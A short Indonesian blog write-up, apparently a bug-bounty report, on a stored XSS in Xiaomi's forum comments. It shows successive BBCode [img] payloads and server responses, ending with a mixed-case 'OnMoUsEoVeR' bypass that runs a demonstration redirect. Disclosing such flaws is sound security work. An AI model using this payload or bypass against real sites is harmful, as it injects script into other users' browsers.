Exploiting XSS via Markdown on Xiaomi

  

Exploiting XSS via Markdown on Xiaomi

Exploiting XSS via Markdown on Xiaomi Bahasa Indonesia  |  English

Apa itu Markdown?

Markdown adalah sebuah tools untuk melakukan konversi text-to-HTML yang bisa digunakan ketika membuat konten web. Dengan menggunakan Markdown kita dapat menulis konten HTML dengan format yang mudah dibaca dan mudah pula untuk ditulis (easy-to-read dan easy-to-write). (Sumber: www.codepolitan.com)

Kerentanan ini ada pada bagian komentar di Forum Xiaomi yang memiliki alamat https://c.mi.com/.


Yang pertama saya coba post gambar pada komentar,
Payloads:
[img]https://server/image.jpg[/img]
Response:
<img src="https://server/image.jpg" />

Lanjut, saya coba memasukkan petik dua setelah gambar,
Payloads:
[img]https://server/image.jpg"[/img]
Response:
<img src="https://server/image.jpg"" />

Sekarang saya coba memasukkan JavaScript event handler attribute,
Payloads:
[img]https://server/image.jpg"onmouseover=[/img]
Response:
<img src="https://server/image.jpg%22onmouseover=" />

Server langsung merubah karakter (") menjadi %22, sekarang saya coba menggunakan beberapa huruf kapital pada event handler-nya,
Payloads:
[img]https://server/image.jpg"OnMoUsEoVeR=[/img]
Response:
<img src="https://server/image.jpg"OnMoUsEoVeR=" />

Lanjut, final payloads
Payloads:
[img]https://server/image.jpg"OnMoUsEoVeR=window.location="//google.com[/img]
Response:
<img src="https://server/image.jpg"OnMoUsEoVeR=window.location="//google.com" />



#HappyHacking

Related Post: